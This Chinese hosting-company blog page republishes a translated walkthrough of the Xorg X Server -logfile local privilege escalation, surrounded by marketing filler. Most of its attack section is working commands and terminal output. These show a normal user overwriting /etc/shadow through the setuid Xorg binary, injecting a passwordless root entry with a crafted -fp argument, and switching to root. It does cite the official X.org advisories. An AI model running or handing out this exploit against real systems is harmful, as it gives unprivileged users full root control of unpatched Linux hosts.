重庆分公司,新征程启航
为企业提供网站建设、域名注册、服务器等服务
Xorg X Server权限提升漏洞是怎样的,相信很多没有经验的人对此束手无策,为此本文总结了问题出现的原因和解决方法,通过这篇文章希望你能解决这个问题。
从网站建设到定制行业解决方案,为提供网站制作、网站设计服务体系,各种行业企业客户提供网站建设解决方案,助力业务快速发展。创新互联将不断加快创新步伐,提供优质的建站服务。
由合天网安实验室翻译
X.org X Server应用程序允许低权限的用户在系统的任何位置创建或覆盖文件,包括特色文件(如:/etc/shadow)。
攻击条件:拥有普通用户的控制台会话权限
CentOS-7
[narendra@localhost ~]$ uname -a
Linux localhost.localdomain 4.18.11-1.el7.elrepo.x86_64 #1 SMP Sat Sep 29 09:42:38 EDT 2018 x86_64 x86_64 xGNU/Linux
X.Org X server 版本:1.19.5
在CentOS和RedHat服务器操作系统上,X.org X Server 可执行文件(/usr/bin/Xorg)具有SETUID权限。
[Dev@localhost ~]$ ls -la /usr/bin/Xorg
-rwsr-xr-x. 1 root root 2409344 Apr 11 22:12 /usr/bin/Xorg
X.org X Server 应用程序中 LogInit()函数用来记录日志,X.org X Server 允许用户使用 “-logfile”选项指定日志文件。
如果系统上已存在与用户提供的"”同名的文件,则将其重命名为“.old”。完成此操作后,将使用用户提供的“”名称创建一个新文件,使用fopen()函数进行调用
Xorg-Server/os/log.c
244 const char *
245 LogInit(const char *fname, const char *backup)
246 {
247 char *logFileName = NULL;
248
249 if (fname && *fname) {
250 if (displayfd != -1) {
251 /* Display isn't set yet, so we can't use it in filenames yet. */
252 char pidstring[32];
253 snprintf(pidstring, sizeof(pidstring), "pid-%ld",
254 (unsigned long) getpid());
255 logFileName = LogFilePrep(fname, backup, pidstring);
256 saved_log_tempname = logFileName;
257
258 /* Save the patterns for use when the display is named. */
259 saved_log_fname = strdup(fname);
260 if (backup == NULL)
261 saved_log_backup = NULL;
262 else
263 saved_log_backup = strdup(backup);
264 } else
265 logFileName = LogFilePrep(fname, backup, display);
266 if ((logFile = fopen(logFileName, "w")) == NULL)
267 FatalError("Cannot open log file \"%s\"\n", logFileName);
268 setvbuf(logFile, NULL, _IONBF, 0);
269
270 logFileFd = fileno(logFile);
可以使用 strace命令跟踪系统底层的 open() 调用过程
stat("mylogfile", 0x7ffcb9654ed0) &n-1 ENOENT (No such file or directory)
open("mylogfile", O_WRONLY|O_CREAT|O_TRUNC, 0666) = 4
rt_sigaction(SIGALRM, {0x55b6e2c2ca70, [ALRM], SA_RESTORER|SA_RESTART, 0x7fb0353036d0}, NULL, 8) = 0
从跟踪日志可以看出,O_EXCL标志没有设置,所以fopen() 函数会创建或者覆盖已有的文件。
主要利用以下3点:
1、fopen()调用的输入是用户可控的文件名
2、fopen()将创建或覆盖已存在的文件
3、可执行文件/usr/bin/Xorg具有setuid权限
/etc/shadow 文件覆盖测试
[Dev@localhost ~]$ uname -r
3.10.0-862.el7.x86_64
[Dev@localhost ~]$ Xorg -version
X.Org X Server 1.19.5
Release Date: 2017-10-12
X Protocol Version 11, Revision 0
Build Operating System: 2.6.32-696.18.7.el6.x86_64
Current Operating System: Linux localhost.localdomain 3.10.0-862.el7.x86_64 #1 SMP Wed Mar 21 18:14:51 EDT 2018 x86_64
Kernel command line: BOOT_IMAGE=/vmlinuz-3.10.0-862.el7.x86_64 root=/dev/mapper/rhel-root ro crashkernel=auto rd.lvm.lv=rhel/root rd.lvm.lv=rhel/swap rhgb quiet LANG=en_US.UTF-8
Build Date: 13 February 2018 02:39:52PM
Build ID: xorg-x11-server 1.19.5-5.el7
Current version of pixman: 0.34.0
Before reporting problems, check http://wiki.x.org to make sure that you have the latest version.
[Dev@localhost ~]
[Dev@localhost ~]$ id
uid=1000(Dev) gid=1000(Dev) groups=1000(Dev) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
[Dev@localhost ~]$
[Dev@localhost ~]$ cd /etc
[Dev@localhost etc]$ ls -la shadow
----------. 1 root root 1650 Oct 6 05:03 shadow
[Dev@localhost etc]$
[Dev@localhost etc]$ cat shadow
cat: shadow: Permission denied
[Dev@localhost etc]$
[Dev@localhost etc]$ Xorg -logfile shadow :1 #指定日志文件为shadow
X.Org X Server 1.19.5
Release Date: 2017-10-12
X Protocol Version 11, Revision 0
Build Operating System: 2.6.32-696.18.7.el6.x86_64
Current Operating System: Linux localhost.localdomain 3.10.0-862.el7.x86_64 #1 SMP Wed Mar 21 18:14:51 EDT 2018 x86_64
Kernel command line: BOOT_IMAGE=/vmlinuz-3.10.0-862.el7.x86_64 root=/dev/mapper/rhel-root ro crashkernel=auto rd.lvm.lv=rhel/root rd.lvm.lv=rhel/swap rhgb quiet LANG=en_US.UTF-8
Build Date: 13 February 2018 02:39:52PM
Build ID: xorg-x11-server 1.19.5-5.el7
Current version of pixman: 0.34.0
Before reporting problems, check http://wiki.x.org to make sure that you have the latest version.
Markers: (--) probed, (**) from config file, (==) default setting,
(++) from command line, (!!) notice, (II) informational,
(WW) warning, (EE) error, (NI) not implemented, (??) unknown.
(++) Log file: "shadow", Time: Sat Oct 6 21:54:13 2018
(==) Using config directory: "/etc/X11/xorg.conf.d"
(==) Using system config directory "/usr/share/X11/xorg.conf.d"
^Cerror setting MTRR (base = 0x00000000e0000000, size = 0x01700000, type = 1) Invalid argument (22)
(II) Server terminated successfully (0). Closing log file.
[Dev@localhost etc]$
[Dev@localhost etc]$
[Dev@localhost etc]$ ls -la shadow
-rw-r--r--. 1 root Dev 53901 Oct 6 21:54 shadow
[Dev@localhost etc]$
[Dev@localhost etc]$ head shadow #写入成功
[ 11941.870]
X.Org X Server 1.19.5
Release Date: 2017-10-12
[ 11941.870] X Protocol Version 11, Revision 0
[ 11941.870] Build Operating System: 2.6.32-696.18.7.el6.x86_64
[ 11941.870] Current Operating System: Linux localhost.localdomain 3.10.0-862.el7.x86_64 #1 SMP Wed Mar 21 18:14:51 EDT 2018 x86_64
[ 11941.870] Kernel command line: BOOT_IMAGE=/vmlinuz-3.10.0-862.el7.x86_64 root=/dev/mapper/rhel-root ro crashkernel=auto rd.lvm.lv=rhel/root rd.lvm.lv=rhel/swap rhgb quiet LANG=en_US.UTF-8
[ 11941.870] Build Date: 13 February 2018 02:39:52PM
[ 11941.870] Build ID: xorg-x11-server 1.19.5-5.el7
[ 11941.870] Current version of pixman: 0.34.0
[Dev@localhost etc]$
权限提升
[Dev@localhost ~]$ id #当前权限
uid=1000(Dev) gid=1000(Dev) groups=1000(Dev) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
[Dev@localhost ~]$
[Dev@localhost ~]$ cd /etc
[Dev@localhost etc]$
[Dev@localhost etc]$ ls -la shadow
----------. 1 root root 1241 Oct 10 01:15 shadow
[Dev@localhost etc]$
[Dev@localhost etc]$ cat shadow #查看权限
cat: shadow: Permission denied
[Dev@localhost etc]$
[Dev@localhost etc]$ Xorg -fp "root::16431:0:99999:7:::" -logfile shadow :1 #写入文件,root无密码
X.Org X Server 1.19.5
Release Date: 2017-10-12
X Protocol Version 11, Revision 0
Build Operating System: 3.10.0-693.17.1.el7.x86_64
Current Operating System: Linux localhost.localdomain 3.10.0-862.14.4.el7.x86_64 #1 SMP Wed Sep 26 15:12:11 UTC 2018 x86_64
Kernel command line: BOOT_IMAGE=/vmlinuz-3.10.0-862.14.4.el7.x86_64 root=/dev/mapper/centos-root ro crashkernel=auto rd.lvm.lv=centos/root rd.lvm.lv=centos/swap rhgb quiet LANG=en_US.UTF-8
Build Date: 11 April 2018 04:40:54PM
Build ID: xorg-x11-server 1.19.5-5.el7
Current version of pixman: 0.34.0
Before reporting problems, check http://wiki.x.org
to make sure that you have the latest version.
Markers: (--) probed, (**) from config file, (==) default setting,
(++) from command line, (!!) notice, (II) informational,
(WW) warning, (EE) error, (NI) not implemented, (??) unknown.
(++) Log file: "shadow", Time: Wed Oct 10 01:16:10 2018
(==) Using config directory: "/etc/X11/xorg.conf.d"
(==) Using system config directory "/usr/share/X11/xorg.conf.d"
^Cerror setting MTRR (base = 0x00000000e0000000, size = 0x01700000, type = 1) Invalid argument (22)
(II) Server terminated successfully (0). Closing log file.
[Dev@localhost etc]$ ls -la shadow
-rw-r--r--. 1 root Dev 53897 Oct 10 01:16 shadow
[Dev@localhost etc]$
[Dev@localhost etc]$ cat shadow | grep "root::" #写入文件成功
root::16431:0:99999:7:::
[Dev@localhost etc]$
[Dev@localhost etc]$
[Dev@localhost etc]$ su #切换到root用户
[root@localhost etc]#
[root@localhost etc]# id #查看权限,提权成功
uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
https://lists.x.org/archives/xorg-announce/2018-October/002927.htmlhttps://lists.x.org/archives/xorg-announce/2018-October/002928.html
看完上述内容,你们掌握Xorg X Server权限提升漏洞是怎样的的方法了吗?如果还想学到更多技能或想了解更多相关内容,欢迎关注创新互联行业资讯频道,感谢各位的阅读!